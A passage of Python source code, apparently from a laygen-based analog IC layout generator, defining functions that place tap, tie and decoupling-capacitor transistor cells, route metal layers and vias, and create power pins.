rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_tap_wovdd(laygen, 
objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_tap, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_nmos_tap, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #tap route xy_tap0 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2) xy_tap1 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VSS1", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: 
rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS1"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VSS1', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2, netname='VSS') laygen.pin(name='VSS0', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2, netname='VSS') def generate_plugged_tap(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_tap, devname_pmos_tap, devname_plug, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin) iplug0 = laygen.place("I"+objectname_pfix + 'PLUG0', devname_plug, pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_tap, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #tap route xy_tap0 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2) xy_tap1 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=in0.name, 
gridname=rg_m1m2) laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VDD0"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_tie(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body, m=1, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m=max(1, int(m/2)) #using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = 
"I"+objectname_pfix+'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') # route # horizontal route style # input for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([i, 0]), ) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([i, 0]), ) # vdd/vss if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), ) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), ) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, 
refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) rvss = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S0', refinstindex1=np.array([0, 0])) rvdd = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S1', refinstindex0=np.array([m-1, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) #align output to input pin # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) 
laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2,refinstindex=np.array([i, 0])) xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([m-1, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([m-1, 0]), refinstname1=ip1.name, refinstindex1=np.array([m-1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0])) # pin rvdd0_pin_xy = laygen.get_xy(obj = rvdd, gridname = rg_m2m3_pin, sort=True) rvss0_pin_xy = laygen.get_xy(obj = rvss, gridname = rg_m2m3_pin, sort=True) rvdd0_pin_xy[0][1] = rvss0_pin_xy[0][1] - 1 rvdd0_pin_xy[1][1] = rvss0_pin_xy[1][1] + 1 rvss0_pin_xy[0][1] = rvss0_pin_xy[0][1] - 1 rvss0_pin_xy[1][1] = rvss0_pin_xy[1][1] + 1 if create_pin == True: laygen.pin(name='TIEVDD', layer=laygen.layers['pin'][3], xy=rvdd0_pin_xy, gridname=rg_m2m3_pin, netname='VDD') laygen.pin(name='TIEVSS', layer=laygen.layers['pin'][3], xy=rvss0_pin_xy, gridname=rg_m2m3_pin, netname='VSS') # power pin rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R" + objectname_pfix + "VDD0"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R" + objectname_pfix + "VSS0"), gridname = rg_m1m2) 
laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_tie_wovdd(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, m=1, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m=max(1, int(m/2)) #using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in0b = laygen.relplace(name = "I"+objectname_pfix+'N0B', templatename = devname_nmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') in1b = laygen.relplace(name = "I"+objectname_pfix+'N1B', templatename = devname_nmos_body, gridname = pg, refinstname = in0b.name, transform='MX', shape=np.array([m, 1])) in2b = laygen.relplace(name = "I"+objectname_pfix+'N2B', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1b.name, transform='MX') # route # horizontal route style # input for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([i, 0]), ) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1b.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=in1b.name, 
refpinname1='D0', refinstindex1=np.array([i, 0]), ) # vdd/vss if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), ) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1b.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1b.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), ) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1b.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1b.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1b.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1b.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 0]), refinstname=in1b.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) rvss = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, 
refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1b.name, refpinname1='S0', refinstindex1=np.array([0, 0])) rvdd = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S1', refinstindex0=np.array([m-1, 0]), refinstname1=in1b.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) #align output to input pin # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VSS1", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0b.name, refinstname1=in2b.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1b.name, refinstindex0=np.array([i, 0]), refinstname1=in1b.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1b.name, gridname=rg_m1m2,refinstindex=np.array([i, 0])) xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([m-1, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * 
np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1b.name, refinstindex0=np.array([m-1, 0]), refinstname1=in1b.name, refinstindex1=np.array([m-1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1b.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0])) # pin rvdd0_pin_xy = laygen.get_xy(obj = rvdd, gridname = rg_m2m3_pin, sort=True) rvss0_pin_xy = laygen.get_xy(obj = rvss, gridname = rg_m2m3_pin, sort=True) rvdd0_pin_xy[0][1] = rvss0_pin_xy[0][1] - 1 rvdd0_pin_xy[1][1] = rvss0_pin_xy[1][1] + 1 rvss0_pin_xy[0][1] = rvss0_pin_xy[0][1] - 1 rvss0_pin_xy[1][1] = rvss0_pin_xy[1][1] + 1 if create_pin == True: laygen.pin(name='TIEVSS2', layer=laygen.layers['pin'][3], xy=rvdd0_pin_xy, gridname=rg_m2m3_pin, netname='VSS') laygen.pin(name='TIEVSS', layer=laygen.layers['pin'][3], xy=rvss0_pin_xy, gridname=rg_m2m3_pin, netname='VSS') # power pin rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R" + objectname_pfix + "VSS1"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R" + objectname_pfix + "VSS0"), gridname = rg_m1m2) laygen.pin(name='VSS1', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2, netname='VSS') laygen.pin(name='VSS0', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2, netname='VSS') def generate_bcap(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_space, m=2, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 m = max(1, int(m / 2)) # using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = 
"I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_space, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_space, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_space, gridname = pg, refinstname = ip1.name, transform='MX') # route #pdict = [laygen.get_inst_pin_xy(None, None, rg_m1m2, index=np.array([i, 0])) for i in range(m)] xy_g0 = laygen.get_template_pin_xy(in1.cellname, 'G0', rg_m1m2)[0, :] xy_d0 = laygen.get_template_pin_xy(in1.cellname, 'D0', rg_m1m2)[0, :] xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) if m > 1: #gate laygen.route(None, laygen.layers['metal'][2], xy0=xy_g0, xy1=xy_g0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_g0, refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) rg0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([0, 
0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) #drain laygen.route(None, laygen.layers['metal'][2], xy0=xy_d0, xy1=xy_d0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_d0, refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I'], rect_list=[rg0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_dcap(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_space, m=2, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 m = max(1, int(m / 2)) # using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = 
devname_pmos_space, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1])) ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_space, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip1b = laygen.relplace(name = "I"+objectname_pfix+'P1B', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') # route #pdict = [laygen.get_inst_pin_xy(None, None, rg_m1m2, index=np.array([i, 0])) for i in range(m)] xy_g0 = laygen.get_template_pin_xy(in1.cellname, 'G0', rg_m1m2)[0, :] xy_d0 = laygen.get_template_pin_xy(in1.cellname, 'D0', rg_m1m2)[0, :] xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) #laygen.route(None, laygen.layers['metal'][1], xy0=xy_g0*np.array([1, 0]), xy1=xy_g0, gridname0=rg_m1m2, # refinstname0=ip1.name, refinstindex0=np.array([i*2, 0]), via0=[[0, 0]], # refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_g0*np.array([1, 0]), xy1=xy_g0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) if m > 1: laygen.route(None, laygen.layers['metal'][2], xy0=xy_d0, xy1=xy_d0, 
gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_d0, refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # pin if create_pin == True: create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_dcap2(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body, m=2, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 m = max(1, int(m / 2)) # using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', 